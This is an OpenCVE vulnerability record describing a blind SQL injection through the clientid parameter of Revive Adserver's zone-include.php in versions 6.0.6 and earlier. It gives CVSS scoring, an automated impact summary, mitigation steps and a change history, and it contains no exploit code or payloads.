Description
A missing sanitisation of user input in the zone-include.php script of Revive Adserver 6.0.6 and earlier. A low‑privileged user could exploit the clientid parameter to perform blind SQL injection attacks. Input sanitisation has been improved to ensure that all parameters processed by the script are properly validated.
Published: 2026-06-23
Score: 8.3 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability originates from a missing sanitization of the user supplied clientid parameter within zone-include.php of Revive AdServer. A low‑privileged user can inject SQL code, leading to a blind SQL injection that may compromise data confidentiality and integrity. The CVSS score of 8.3 indicates a high severity of this flaw. No exploit has been reported publicly and the vulnerability is not listed in CISA’s KEV catalog.

Affected Systems

The affected product is Revive Adserver, specifically versions 6.0.6 and earlier. Updates that include proper input validation for all zone‑include.php parameters have been released by Revive to mitigate this issue.

Risk and Exploitability

The exploit vector is likely a web‑based request to zone‑include.php where the attacker controls the clientid field. Because the flaw is a blind injection, an attacker would need to infer the impact through side‑channels such as timing or exceptions, but the high CVSS score reflects the potential for significant data exposure. Although the EPSS score is currently unavailable, the absence of public exploits and KEV listing suggests a moderate likelihood of widespread exploitation, yet the vulnerability remains a actionable risk for any site that has not upgraded beyond 6.0.6.

Generated by OpenCVE AI on June 23, 2026 at 19:21 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Revive AdServer to the latest version that includes input sanitization for zone‑include.php.
  • If an upgrade is not immediately possible, remove or restrict low‑privileged user access to the zone‑include.php script or the clientid parameter.
  • Deploy a web application firewall to block suspicious SQL injection patterns on incoming requests to zone‑include.php.
  • Review database logs for abnormal queries that could indicate exploitation attempts.

Generated by OpenCVE AI on June 23, 2026 at 19:21 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

References
Link Providers
https://hackerone.com/reports/3653196 cve-icon
History

Tue, 23 Jun 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Revive
Revive adserver
Vendors & Products Revive
Revive adserver

Tue, 23 Jun 2026 19:45:00 +0000

Type Values Removed Values Added
Title Blind SQL Injection via Missing Input Sanitization in zone-include.php of Revive Ad Server

Tue, 23 Jun 2026 18:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 23 Jun 2026 16:45:00 +0000

Type Values Removed Values Added
Description A missing sanitisation of user input in the zone-include.php script of Revive Adserver 6.0.6 and earlier. A low‑privileged user could exploit the clientid parameter to perform blind SQL injection attacks. Input sanitisation has been improved to ensure that all parameters processed by the script are properly validated.
Weaknesses CWE-89
References
Metrics cvssV3_0

{'score': 8.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H'}

Subscriptions

Revive Adserver
cve-icon MITRE

Status: PUBLISHED

Assigner: hackerone

Published:

Updated: 2026-06-23T17:27:08.997Z

Reserved: 2026-03-31T15:00:06.522Z

Link: CVE-2026-34914

cve-icon Vulnrichment

Updated: 2026-06-23T17:27:04.087Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-23T20:15:04Z

Weaknesses
  • CWE-89

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')